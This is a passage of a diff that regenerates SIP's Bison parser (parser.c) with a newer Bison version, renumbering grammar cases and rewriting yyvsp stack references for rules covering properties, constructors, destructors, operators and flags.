(yyval.property).name = NULL; +- (yyval.property).set = (yyvsp[(3) - (3)].text); ++ (yyval.property).set = (yyvsp[0].text); + } ++#line 6599 "../parser.c" + break; + +- case 434: +-#line 3511 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 435: /* property_body: %empty */ ++#line 3537 "parser.y" ++ { + (yyval.property).token = 0; + (yyval.property).docstring = NULL; + } ++#line 6608 "../parser.c" + break; + +- case 435: +-#line 3515 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.property) = (yyvsp[(2) - (4)].property); ++ case 436: /* property_body: '{' property_body_directives '}' ';' */ ++#line 3541 "parser.y" ++ { ++ (yyval.property) = (yyvsp[-2].property); + } ++#line 6616 "../parser.c" + break; + +- case 437: +-#line 3521 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.property) = (yyvsp[(1) - (2)].property); ++ case 438: /* property_body_directives: property_body_directives property_body_directive */ ++#line 3547 "parser.y" ++ { ++ (yyval.property) = (yyvsp[-1].property); + +- switch ((yyvsp[(2) - (2)].property).token) ++ switch ((yyvsp[0].property).token) + { +- case TK_DOCSTRING: (yyval.property).docstring = (yyvsp[(2) - (2)].property).docstring; break; ++ case TK_DOCSTRING: (yyval.property).docstring = (yyvsp[0].property).docstring; break; + } + } ++#line 6629 "../parser.c" + break; + +- case 438: +-#line 3531 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 439: /* property_body_directive: ifstart */ ++#line 3557 "parser.y" ++ { + (yyval.property).token = TK_IF; + } ++#line 6637 "../parser.c" + break; + +- case 439: +-#line 3534 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 440: /* property_body_directive: ifend */ ++#line 3560 "parser.y" ++ { + (yyval.property).token = TK_END; + } ++#line 6645 "../parser.c" + break; + +- case 440: +-#line 3537 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 441: /* property_body_directive: docstring */ ++#line 3563 "parser.y" ++ { + if (notSkipping()) + { + (yyval.property).token = TK_DOCSTRING; +- (yyval.property).docstring = (yyvsp[(1) - (1)].docstr); ++ (yyval.property).docstring = (yyvsp[0].docstr); + } + else + { +@@ -6728,30 +6658,34 @@ yyreduce: + (yyval.property).docstring = NULL; + } + } ++#line 6662 "../parser.c" + break; + +- case 443: +-#line 3555 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 444: /* optslot: %empty */ ++#line 3581 "parser.y" ++ { + (yyval.number) = 0; + } ++#line 6670 "../parser.c" + break; + +- case 444: +-#line 3558 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 445: /* optslot: TK_SLOTS */ ++#line 3584 "parser.y" ++ { + (yyval.number) = SECT_IS_SLOT; + } ++#line 6678 "../parser.c" + break; + +- case 445: +-#line 3564 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentIsVirt = TRUE;} ++ case 446: /* $@15: %empty */ ++#line 3590 "parser.y" ++ {currentIsVirt = TRUE;} ++#line 6684 "../parser.c" + break; + +- case 448: +-#line 3568 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 449: /* dtor_decl: '~' TK_NAME_VALUE '(' ')' optexceptions optabstract optflags ';' premethodcode methodcode virtualcatchercode */ ++#line 3594 "parser.y" ++ { + /* Note that we allow non-virtual dtors in C modules. */ + + if (notSkipping()) +@@ -6764,22 +6698,22 @@ yyreduce: + + classDef *cd = currentScope(); + +- checkAnnos(&(yyvsp[(7) - (11)].optflags), annos); ++ checkAnnos(&(yyvsp[-4].optflags), annos); + +- if (strcmp(classBaseName(cd),(yyvsp[(2) - (11)].text)) != 0) ++ if (strcmp(classBaseName(cd),(yyvsp[-9].text)) != 0) + yyerror("Destructor doesn't have the same name as its class"); + + if (isDtor(cd)) + yyerror("Destructor has already been defined"); + +- if (currentSpec -> genc && (yyvsp[(9) - (11)].codeb) == NULL) ++ if (currentSpec -> genc && (yyvsp[-2].codeb) == NULL) + yyerror("Destructor in C modules must include %MethodCode"); + + +- appendCodeBlock(&cd->dealloccode, (yyvsp[(9) - (11)].codeb)); /* premethodcode */ +- appendCodeBlock(&cd->dealloccode, (yyvsp[(10) - (11)].codeb)); /* methodcode */ +- appendCodeBlock(&cd->dtorcode, (yyvsp[(11) - (11)].codeb)); +- cd -> dtorexceptions = (yyvsp[(5) - (11)].throwlist); ++ appendCodeBlock(&cd->dealloccode, (yyvsp[-2].codeb)); /* premethodcode */ ++ appendCodeBlock(&cd->dealloccode, (yyvsp[-1].codeb)); /* methodcode */ ++ appendCodeBlock(&cd->dtorcode, (yyvsp[0].codeb)); ++ cd -> dtorexceptions = (yyvsp[-6].throwlist); + + /* + * Note that we don't apply the protected/public hack to dtors +@@ -6787,7 +6721,7 @@ yyreduce: + */ + cd->classflags |= sectionFlags; + +- if ((yyvsp[(6) - (11)].number)) ++ if ((yyvsp[-5].number)) + { + if (!currentIsVirt) + yyerror("Abstract destructor must be virtual"); +@@ -6799,7 +6733,7 @@ yyreduce: + * The class has a shadow if we have a virtual dtor or some + * dtor code. + */ +- if (currentIsVirt || (yyvsp[(10) - (11)].codeb) != NULL) ++ if (currentIsVirt || (yyvsp[-1].codeb) != NULL) + { + if (currentSpec -> genc) + yyerror("Virtual destructor or %VirtualCatcherCode not allowed in a C module"); +@@ -6807,24 +6741,26 @@ yyreduce: + setNeedsShadow(cd); + } + +- if (getReleaseGIL(&(yyvsp[(7) - (11)].optflags))) ++ if (getReleaseGIL(&(yyvsp[-4].optflags))) + setIsReleaseGILDtor(cd); +- else if (getHoldGIL(&(yyvsp[(7) - (11)].optflags))) ++ else if (getHoldGIL(&(yyvsp[-4].optflags))) + setIsHoldGILDtor(cd); + } + + currentIsVirt = FALSE; + } ++#line 6753 "../parser.c" + break; + +- case 449: +-#line 3634 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentCtorIsExplicit = TRUE;} ++ case 450: /* $@16: %empty */ ++#line 3660 "parser.y" ++ {currentCtorIsExplicit = TRUE;} ++#line 6759 "../parser.c" + break; + +- case 452: +-#line 3638 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 453: /* simplector: TK_NAME_VALUE '(' arglist ')' optexceptions optflags optctorsig ';' optdocstring premethodcode methodcode */ ++#line 3664 "parser.y" ++ { + /* Note that we allow ctors in C modules. */ + + if (notSkipping()) +@@ -6846,11 +6782,11 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(6) - (11)].optflags), annos); ++ checkAnnos(&(yyvsp[-5].optflags), annos); + + if (currentSpec -> genc) + { +- if ((yyvsp[(10) - (11)].codeb) == NULL && (yyvsp[(3) - (11)].signature).nrArgs != 0) ++ if ((yyvsp[-1].codeb) == NULL && (yyvsp[-8].signature).nrArgs != 0) + yyerror("Constructors with arguments in C modules must include %MethodCode"); + + if (currentCtorIsExplicit) +@@ -6860,80 +6796,87 @@ yyreduce: + if ((sectionFlags & (SECT_IS_PUBLIC | SECT_IS_PROT | SECT_IS_PRIVATE)) == 0) + yyerror("Constructor must be in the public, private or protected sections"); + +- newCtor(currentModule, (yyvsp[(1) - (11)].text), sectionFlags, &(yyvsp[(3) - (11)].signature), &(yyvsp[(6) - (11)].optflags), (yyvsp[(11) - (11)].codeb), (yyvsp[(5) - (11)].throwlist), (yyvsp[(7) - (11)].optsignature), +- currentCtorIsExplicit, (yyvsp[(9) - (11)].docstr), (yyvsp[(10) - (11)].codeb)); ++ newCtor(currentModule, (yyvsp[-10].text), sectionFlags, &(yyvsp[-8].signature), &(yyvsp[-5].optflags), (yyvsp[0].codeb), (yyvsp[-6].throwlist), (yyvsp[-4].optsignature), ++ currentCtorIsExplicit, (yyvsp[-2].docstr), (yyvsp[-1].codeb)); + } + +- free((yyvsp[(1) - (11)].text)); ++ free((yyvsp[-10].text)); + + currentCtorIsExplicit = FALSE; + } ++#line 6808 "../parser.c" + break; + +- case 453: +-#line 3684 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 454: /* optctorsig: %empty */ ++#line 3710 "parser.y" ++ { + (yyval.optsignature) = NULL; + } ++#line 6816 "../parser.c" + break; + +- case 454: +-#line 3687 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 455: /* $@17: %empty */ ++#line 3713 "parser.y" ++ { + parsingCSignature = TRUE; + } ++#line 6824 "../parser.c" + break; + +- case 455: +-#line 3689 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 456: /* optctorsig: '[' $@17 '(' arglist ')' ']' */ ++#line 3715 "parser.y" ++ { + (yyval.optsignature) = sipMalloc(sizeof (signatureDef)); + +- *(yyval.optsignature) = (yyvsp[(4) - (6)].signature); ++ *(yyval.optsignature) = (yyvsp[-2].signature); + + parsingCSignature = FALSE; + } ++#line 6836 "../parser.c" + break; + +- case 456: +-#line 3698 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 457: /* optsig: %empty */ ++#line 3724 "parser.y" ++ { + (yyval.optsignature) = NULL; + } ++#line 6844 "../parser.c" + break; + +- case 457: +-#line 3701 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 458: /* $@18: %empty */ ++#line 3727 "parser.y" ++ { + parsingCSignature = TRUE; + } ++#line 6852 "../parser.c" + break; + +- case 458: +-#line 3703 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 459: /* optsig: '[' $@18 cpptype '(' arglist ')' ']' */ ++#line 3729 "parser.y" ++ { + (yyval.optsignature) = sipMalloc(sizeof (signatureDef)); + +- *(yyval.optsignature) = (yyvsp[(5) - (7)].signature); +- (yyval.optsignature)->result = (yyvsp[(3) - (7)].memArg); ++ *(yyval.optsignature) = (yyvsp[-2].signature); ++ (yyval.optsignature)->result = (yyvsp[-4].memArg); + + parsingCSignature = FALSE; + } ++#line 6865 "../parser.c" + break; + +- case 459: +-#line 3713 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 460: /* function: cpptype TK_NAME_VALUE '(' arglist ')' optconst optfinal optexceptions optabstract optflags optsig ';' optdocstring premethodcode methodcode virtualcatchercode virtualcallcode */ ++#line 3739 "parser.y" ++ { + if (notSkipping()) + { +- applyTypeFlags(currentModule, &(yyvsp[(1) - (17)].memArg), &(yyvsp[(10) - (17)].optflags)); ++ applyTypeFlags(currentModule, &(yyvsp[-16].memArg), &(yyvsp[-7].optflags)); + +- (yyvsp[(4) - (17)].signature).result = (yyvsp[(1) - (17)].memArg); ++ (yyvsp[-13].signature).result = (yyvsp[-16].memArg); + + newFunction(currentSpec, currentModule, currentScope(), NULL, + NULL, sectionFlags, currentIsStatic, currentIsSignal, +- currentIsSlot, currentIsVirt, (yyvsp[(2) - (17)].text), &(yyvsp[(4) - (17)].signature), (yyvsp[(6) - (17)].number), (yyvsp[(9) - (17)].number), &(yyvsp[(10) - (17)].optflags), +- (yyvsp[(15) - (17)].codeb), (yyvsp[(16) - (17)].codeb), (yyvsp[(17) - (17)].codeb), (yyvsp[(8) - (17)].throwlist), (yyvsp[(11) - (17)].optsignature), (yyvsp[(13) - (17)].docstr), (yyvsp[(7) - (17)].number), (yyvsp[(14) - (17)].codeb)); ++ currentIsSlot, currentIsVirt, (yyvsp[-15].text), &(yyvsp[-13].signature), (yyvsp[-11].number), (yyvsp[-8].number), &(yyvsp[-7].optflags), ++ (yyvsp[-2].codeb), (yyvsp[-1].codeb), (yyvsp[0].codeb), (yyvsp[-9].throwlist), (yyvsp[-6].optsignature), (yyvsp[-4].docstr), (yyvsp[-10].number), (yyvsp[-3].codeb)); + } + + currentIsStatic = FALSE; +@@ -6941,11 +6884,12 @@ yyreduce: + currentIsSlot = FALSE; + currentIsVirt = FALSE; + } ++#line 6888 "../parser.c" + break; + +- case 460: +-#line 3731 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 461: /* function: cpptype TK_OPERATOR '=' '(' cpptype ')' ';' */ ++#line 3757 "parser.y" ++ { + /* + * It looks like an assignment operator (though we don't bother to + * check the types) so make sure it is private. +@@ -6965,11 +6909,12 @@ yyreduce: + currentIsSlot = FALSE; + currentIsVirt = FALSE; + } ++#line 6913 "../parser.c" + break; + +- case 461: +-#line 3751 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 462: /* function: cpptype TK_OPERATOR operatorname '(' arglist ')' optconst optfinal optexceptions optabstract optflags optsig ';' premethodcode methodcode virtualcatchercode virtualcallcode */ ++#line 3777 "parser.y" ++ { + if (notSkipping()) + { + classDef *cd = currentScope(); +@@ -6989,23 +6934,23 @@ yyreduce: + ns_scope = NULL; + } + +- applyTypeFlags(currentModule, &(yyvsp[(1) - (17)].memArg), &(yyvsp[(11) - (17)].optflags)); ++ applyTypeFlags(currentModule, &(yyvsp[-16].memArg), &(yyvsp[-6].optflags)); + + /* Handle the unary '+' and '-' operators. */ +- if ((cd != NULL && (yyvsp[(5) - (17)].signature).nrArgs == 0) || (cd == NULL && (yyvsp[(5) - (17)].signature).nrArgs == 1)) ++ if ((cd != NULL && (yyvsp[-12].signature).nrArgs == 0) || (cd == NULL && (yyvsp[-12].signature).nrArgs == 1)) + { +- if (strcmp((yyvsp[(3) - (17)].text), "__add__") == 0) +- (yyvsp[(3) - (17)].text) = "__pos__"; +- else if (strcmp((yyvsp[(3) - (17)].text), "__sub__") == 0) +- (yyvsp[(3) - (17)].text) = "__neg__"; ++ if (strcmp((yyvsp[-14].text), "__add__") == 0) ++ (yyvsp[-14].text) = "__pos__"; ++ else if (strcmp((yyvsp[-14].text), "__sub__") == 0) ++ (yyvsp[-14].text) = "__neg__"; + } + +- (yyvsp[(5) - (17)].signature).result = (yyvsp[(1) - (17)].memArg); ++ (yyvsp[-12].signature).result = (yyvsp[-16].memArg); + + newFunction(currentSpec, currentModule, cd, ns_scope, NULL, + sectionFlags, currentIsStatic, currentIsSignal, +- currentIsSlot, currentIsVirt, (yyvsp[(3) - (17)].text), &(yyvsp[(5) - (17)].signature), (yyvsp[(7) - (17)].number), (yyvsp[(10) - (17)].number), &(yyvsp[(11) - (17)].optflags), +- (yyvsp[(15) - (17)].codeb), (yyvsp[(16) - (17)].codeb), (yyvsp[(17) - (17)].codeb), (yyvsp[(9) - (17)].throwlist), (yyvsp[(12) - (17)].optsignature), NULL, (yyvsp[(8) - (17)].number), (yyvsp[(14) - (17)].codeb)); ++ currentIsSlot, currentIsVirt, (yyvsp[-14].text), &(yyvsp[-12].signature), (yyvsp[-10].number), (yyvsp[-7].number), &(yyvsp[-6].optflags), ++ (yyvsp[-2].codeb), (yyvsp[-1].codeb), (yyvsp[0].codeb), (yyvsp[-8].throwlist), (yyvsp[-5].optsignature), NULL, (yyvsp[-9].number), (yyvsp[-3].codeb)); + } + + currentIsStatic = FALSE; +@@ -7013,22 +6958,23 @@ yyreduce: + currentIsSlot = FALSE; + currentIsVirt = FALSE; + } ++#line 6962 "../parser.c" + break; + +- case 462: +-#line 3795 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 463: /* function: TK_OPERATOR cpptype '(' arglist ')' optconst optfinal optexceptions optabstract optflags optsig ';' premethodcode methodcode virtualcatchercode virtualcallcode */ ++#line 3821 "parser.y" ++ { + if (notSkipping()) + { + char *sname; + classDef *scope = currentScope(); + +- if (scope == NULL || (yyvsp[(4) - (16)].signature).nrArgs != 0) ++ if (scope == NULL || (yyvsp[-12].signature).nrArgs != 0) + yyerror("Operator casts must be specified in a class and have no arguments"); + +- applyTypeFlags(currentModule, &(yyvsp[(2) - (16)].memArg), &(yyvsp[(10) - (16)].optflags)); ++ applyTypeFlags(currentModule, &(yyvsp[-14].memArg), &(yyvsp[-6].optflags)); + +- switch ((yyvsp[(2) - (16)].memArg).atype) ++ switch ((yyvsp[-14].memArg).atype) + { + case defined_type: + sname = NULL; +@@ -7067,12 +7013,12 @@ yyreduce: + + if (sname != NULL) + { +- (yyvsp[(4) - (16)].signature).result = (yyvsp[(2) - (16)].memArg); ++ (yyvsp[-12].signature).result = (yyvsp[-14].memArg); + + newFunction(currentSpec, currentModule, scope, NULL, NULL, + sectionFlags, currentIsStatic, currentIsSignal, +- currentIsSlot, currentIsVirt, sname, &(yyvsp[(4) - (16)].signature), (yyvsp[(6) - (16)].number), (yyvsp[(9) - (16)].number), +- &(yyvsp[(10) - (16)].optflags), (yyvsp[(14) - (16)].codeb), (yyvsp[(15) - (16)].codeb), (yyvsp[(16) - (16)].codeb), (yyvsp[(8) - (16)].throwlist), (yyvsp[(11) - (16)].optsignature), NULL, (yyvsp[(7) - (16)].number), (yyvsp[(13) - (16)].codeb)); ++ currentIsSlot, currentIsVirt, sname, &(yyvsp[-12].signature), (yyvsp[-10].number), (yyvsp[-7].number), ++ &(yyvsp[-6].optflags), (yyvsp[-2].codeb), (yyvsp[-1].codeb), (yyvsp[0].codeb), (yyvsp[-8].throwlist), (yyvsp[-5].optsignature), NULL, (yyvsp[-9].number), (yyvsp[-3].codeb)); + } + else + { +@@ -7080,11 +7026,11 @@ yyreduce: + + /* Check it doesn't already exist. */ + for (al = scope->casts; al != NULL; al = al->next) +- if (compareScopedNames((yyvsp[(2) - (16)].memArg).u.snd, al->arg.u.snd) == 0) ++ if (compareScopedNames((yyvsp[-14].memArg).u.snd, al->arg.u.snd) == 0) + yyerror("This operator cast has already been specified in this class"); + + al = sipMalloc(sizeof (argList)); +- al->arg = (yyvsp[(2) - (16)].memArg); ++ al->arg = (yyvsp[-14].memArg); + al->next = scope->casts; + + scope->casts = al; +@@ -7096,367 +7042,421 @@ yyreduce: + currentIsSlot = FALSE; + currentIsVirt = FALSE; + } ++#line 7046 "../parser.c" + break; + +- case 463: +-#line 3876 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__add__";} ++ case 464: /* operatorname: '+' */ ++#line 3902 "parser.y" ++ {(yyval.text) = "__add__";} ++#line 7052 "../parser.c" + break; + +- case 464: +-#line 3877 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__sub__";} ++ case 465: /* operatorname: '-' */ ++#line 3903 "parser.y" ++ {(yyval.text) = "__sub__";} ++#line 7058 "../parser.c" + break; + +- case 465: +-#line 3878 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__mul__";} ++ case 466: /* operatorname: '*' */ ++#line 3904 "parser.y" ++ {(yyval.text) = "__mul__";} ++#line 7064 "../parser.c" + break; + +- case 466: +-#line 3879 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__div__";} ++ case 467: /* operatorname: '/' */ ++#line 3905 "parser.y" ++ {(yyval.text) = "__div__";} ++#line 7070 "../parser.c" + break; + +- case 467: +-#line 3880 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__mod__";} ++ case 468: /* operatorname: '%' */ ++#line 3906 "parser.y" ++ {(yyval.text) = "__mod__";} ++#line 7076 "../parser.c" + break; + +- case 468: +-#line 3881 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__and__";} ++ case 469: /* operatorname: '&' */ ++#line 3907 "parser.y" ++ {(yyval.text) = "__and__";} ++#line 7082 "../parser.c" + break; + +- case 469: +-#line 3882 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__or__";} ++ case 470: /* operatorname: '|' */ ++#line 3908 "parser.y" ++ {(yyval.text) = "__or__";} ++#line 7088 "../parser.c" + break; + +- case 470: +-#line 3883 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__xor__";} ++ case 471: /* operatorname: '^' */ ++#line 3909 "parser.y" ++ {(yyval.text) = "__xor__";} ++#line 7094 "../parser.c" + break; + +- case 471: +-#line 3884 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__lshift__";} ++ case 472: /* operatorname: '<' '<' */ ++#line 3910 "parser.y" ++ {(yyval.text) = "__lshift__";} ++#line 7100 "../parser.c" + break; + +- case 472: +-#line 3885 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__rshift__";} ++ case 473: /* operatorname: '>' '>' */ ++#line 3911 "parser.y" ++ {(yyval.text) = "__rshift__";} ++#line 7106 "../parser.c" + break; + +- case 473: +-#line 3886 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__iadd__";} ++ case 474: /* operatorname: '+' '=' */ ++#line 3912 "parser.y" ++ {(yyval.text) = "__iadd__";} ++#line 7112 "../parser.c" + break; + +- case 474: +-#line 3887 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__isub__";} ++ case 475: /* operatorname: '-' '=' */ ++#line 3913 "parser.y" ++ {(yyval.text) = "__isub__";} ++#line 7118 "../parser.c" + break; + +- case 475: +-#line 3888 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__imul__";} ++ case 476: /* operatorname: '*' '=' */ ++#line 3914 "parser.y" ++ {(yyval.text) = "__imul__";} ++#line 7124 "../parser.c" + break; + +- case 476: +-#line 3889 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__idiv__";} ++ case 477: /* operatorname: '/' '=' */ ++#line 3915 "parser.y" ++ {(yyval.text) = "__idiv__";} ++#line 7130 "../parser.c" + break; + +- case 477: +-#line 3890 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__imod__";} ++ case 478: /* operatorname: '%' '=' */ ++#line 3916 "parser.y" ++ {(yyval.text) = "__imod__";} ++#line 7136 "../parser.c" + break; + +- case 478: +-#line 3891 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__iand__";} ++ case 479: /* operatorname: '&' '=' */ ++#line 3917 "parser.y" ++ {(yyval.text) = "__iand__";} ++#line 7142 "../parser.c" + break; + +- case 479: +-#line 3892 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__ior__";} ++ case 480: /* operatorname: '|' '=' */ ++#line 3918 "parser.y" ++ {(yyval.text) = "__ior__";} ++#line 7148 "../parser.c" + break; + +- case 480: +-#line 3893 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__ixor__";} ++ case 481: /* operatorname: '^' '=' */ ++#line 3919 "parser.y" ++ {(yyval.text) = "__ixor__";} ++#line 7154 "../parser.c" + break; + +- case 481: +-#line 3894 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__ilshift__";} ++ case 482: /* operatorname: '<' '<' '=' */ ++#line 3920 "parser.y" ++ {(yyval.text) = "__ilshift__";} ++#line 7160 "../parser.c" + break; + +- case 482: +-#line 3895 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__irshift__";} ++ case 483: /* operatorname: '>' '>' '=' */ ++#line 3921 "parser.y" ++ {(yyval.text) = "__irshift__";} ++#line 7166 "../parser.c" + break; + +- case 483: +-#line 3896 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__invert__";} ++ case 484: /* operatorname: '~' */ ++#line 3922 "parser.y" ++ {(yyval.text) = "__invert__";} ++#line 7172 "../parser.c" + break; + +- case 484: +-#line 3897 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__call__";} ++ case 485: /* operatorname: '(' ')' */ ++#line 3923 "parser.y" ++ {(yyval.text) = "__call__";} ++#line 7178 "../parser.c" + break; + +- case 485: +-#line 3898 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__getitem__";} ++ case 486: /* operatorname: '[' ']' */ ++#line 3924 "parser.y" ++ {(yyval.text) = "__getitem__";} ++#line 7184 "../parser.c" + break; + +- case 486: +-#line 3899 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__lt__";} ++ case 487: /* operatorname: '<' */ ++#line 3925 "parser.y" ++ {(yyval.text) = "__lt__";} ++#line 7190 "../parser.c" + break; + +- case 487: +-#line 3900 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__le__";} ++ case 488: /* operatorname: '<' '=' */ ++#line 3926 "parser.y" ++ {(yyval.text) = "__le__";} ++#line 7196 "../parser.c" + break; + +- case 488: +-#line 3901 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__eq__";} ++ case 489: /* operatorname: '=' '=' */ ++#line 3927 "parser.y" ++ {(yyval.text) = "__eq__";} ++#line 7202 "../parser.c" + break; + +- case 489: +-#line 3902 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__ne__";} ++ case 490: /* operatorname: '!' '=' */ ++#line 3928 "parser.y" ++ {(yyval.text) = "__ne__";} ++#line 7208 "../parser.c" + break; + +- case 490: +-#line 3903 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__gt__";} ++ case 491: /* operatorname: '>' */ ++#line 3929 "parser.y" ++ {(yyval.text) = "__gt__";} ++#line 7214 "../parser.c" + break; + +- case 491: +-#line 3904 "sip-4.19.23/sipgen/metasrc/parser.y" +- {(yyval.text) = "__ge__";} ++ case 492: /* operatorname: '>' '=' */ ++#line 3930 "parser.y" ++ {(yyval.text) = "__ge__";} ++#line 7220 "../parser.c" + break; + +- case 492: +-#line 3907 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 493: /* optconst: %empty */ ++#line 3933 "parser.y" ++ { + (yyval.number) = FALSE; + } ++#line 7228 "../parser.c" + break; + +- case 493: +-#line 3910 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 494: /* optconst: TK_CONST */ ++#line 3936 "parser.y" ++ { + (yyval.number) = TRUE; + } ++#line 7236 "../parser.c" + break; + +- case 494: +-#line 3915 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 495: /* optfinal: %empty */ ++#line 3941 "parser.y" ++ { + (yyval.number) = FALSE; + } ++#line 7244 "../parser.c" + break; + +- case 495: +-#line 3918 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 496: /* optfinal: TK_FINAL */ ++#line 3944 "parser.y" ++ { + (yyval.number) = TRUE; + } ++#line 7252 "../parser.c" + break; + +- case 496: +-#line 3923 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 497: /* optabstract: %empty */ ++#line 3949 "parser.y" ++ { + (yyval.number) = 0; + } ++#line 7260 "../parser.c" + break; + +- case 497: +-#line 3926 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (2)].number) != 0) ++ case 498: /* optabstract: '=' TK_NUMBER_VALUE */ ++#line 3952 "parser.y" ++ { ++ if ((yyvsp[0].number) != 0) + yyerror("Abstract virtual function '= 0' expected"); + + (yyval.number) = TRUE; + } ++#line 7271 "../parser.c" + break; + +- case 498: +-#line 3934 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 499: /* optflags: %empty */ ++#line 3960 "parser.y" ++ { + (yyval.optflags).nrFlags = 0; + } ++#line 7279 "../parser.c" + break; + +- case 499: +-#line 3937 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.optflags) = (yyvsp[(2) - (3)].optflags); ++ case 500: /* optflags: '/' flaglist '/' */ ++#line 3963 "parser.y" ++ { ++ (yyval.optflags) = (yyvsp[-1].optflags); + } ++#line 7287 "../parser.c" + break; + +- case 500: +-#line 3943 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.optflags).flags[0] = (yyvsp[(1) - (1)].flag); ++ case 501: /* flaglist: flag */ ++#line 3969 "parser.y" ++ { ++ (yyval.optflags).flags[0] = (yyvsp[0].flag); + (yyval.optflags).nrFlags = 1; + } ++#line 7296 "../parser.c" + break; + +- case 501: +-#line 3947 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 502: /* flaglist: flaglist ',' flag */ ++#line 3973 "parser.y" ++ { + /* Check there is room. */ + +- if ((yyvsp[(1) - (3)].optflags).nrFlags == MAX_NR_FLAGS) ++ if ((yyvsp[-2].optflags).nrFlags == MAX_NR_FLAGS) + yyerror("Too many optional flags"); + +- (yyval.optflags) = (yyvsp[(1) - (3)].optflags); ++ (yyval.optflags) = (yyvsp[-2].optflags); + +- (yyval.optflags).flags[(yyval.optflags).nrFlags++] = (yyvsp[(3) - (3)].flag); ++ (yyval.optflags).flags[(yyval.optflags).nrFlags++] = (yyvsp[0].flag); + } ++#line 7311 "../parser.c" + break; + +- case 502: +-#line 3959 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 503: /* flag: TK_NAME_VALUE */ ++#line 3985 "parser.y" ++ { + (yyval.flag).ftype = bool_flag; +- (yyval.flag).fname = (yyvsp[(1) - (1)].text); ++ (yyval.flag).fname = (yyvsp[0].text); + } ++#line 7320 "../parser.c" + break; + +- case 503: +-#line 3963 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.flag) = (yyvsp[(3) - (3)].flag); +- (yyval.flag).fname = (yyvsp[(1) - (3)].text); ++ case 504: /* flag: TK_NAME_VALUE '=' flagvalue */ ++#line 3989 "parser.y" ++ { ++ (yyval.flag) = (yyvsp[0].flag); ++ (yyval.flag).fname = (yyvsp[-2].text); + } ++#line 7329 "../parser.c" + break; + +- case 504: +-#line 3969 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.flag).ftype = (strchr((yyvsp[(1) - (1)].text), '.') != NULL) ? dotted_name_flag : name_flag; +- (yyval.flag).fvalue.sval = (yyvsp[(1) - (1)].text); ++ case 505: /* flagvalue: dottedname */ ++#line 3995 "parser.y" ++ { ++ (yyval.flag).ftype = (strchr((yyvsp[0].text), '.') != NULL) ? dotted_name_flag : name_flag; ++ (yyval.flag).fvalue.sval = (yyvsp[0].text); + } ++#line 7338 "../parser.c" + break; + +- case 505: +-#line 3973 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 506: /* flagvalue: TK_NAME_VALUE ':' optnumber '-' optnumber */ ++#line 